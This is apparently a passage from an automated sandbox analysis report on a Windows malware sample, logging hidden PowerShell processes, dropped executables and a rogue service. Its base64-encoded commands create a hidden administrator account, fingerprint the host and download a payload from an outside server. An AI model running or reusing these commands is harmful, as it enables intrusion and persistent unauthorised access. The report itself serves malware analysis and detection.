AGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"			Jump to behavior

Source: svczHost.exe.9.dr	Static PE information: section name: .managed
Source: svczHost.exe.9.dr	Static PE information: section name: hydrated
Source: myRdpService.exe.16.dr	Static PE information: section name: .managed
Source: myRdpService.exe.16.dr	Static PE information: section name: hydrated

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC455055CB push eax; iretd	1_2_00007FFC4550560D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC45507C9E push eax; retf	1_2_00007FFC45507CAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC4550786E pushad ; iretd	1_2_00007FFC4550789D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC454F50A3 push eax; retf	1_2_00007FFC454F50B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC4550789E push eax; iretd	1_2_00007FFC455078AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC454FE96A push ebx; retn 0009h	1_2_00007FFC454FE99A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC45507C6E pushad ; retf	1_2_00007FFC45507C9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC454F2315 pushad ; iretd	1_2_00007FFC454F232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFC453CD2A5 pushad ; iretd	5_2_00007FFC453CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFC453CD2A5 pushad ; iretd	9_2_00007FFC453CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFC454E75D9 push ebx; iretd	9_2_00007FFC454E75DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFC454E819B push ebx; ret	9_2_00007FFC454E81DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFC454E8198 push ebx; ret	9_2_00007FFC454E81DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFC455B4D3A push esi; iretd	9_2_00007FFC455B4D3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFC454F9357 push esp; retf	20_2_00007FFC454F9358
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFC454F2B1D push E83B0B49h; ret	20_2_00007FFC454F2B69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_00007FFC4550161D push E95A6D01h; ret	51_2_00007FFC45501639
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_00007FFC455022F0 pushad ; iretd	51_2_00007FFC4550232D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe	Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe			Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe			Jump to dropped file

Source: C:\Windows\Temp\myRdpService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc query myRdpService

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8000
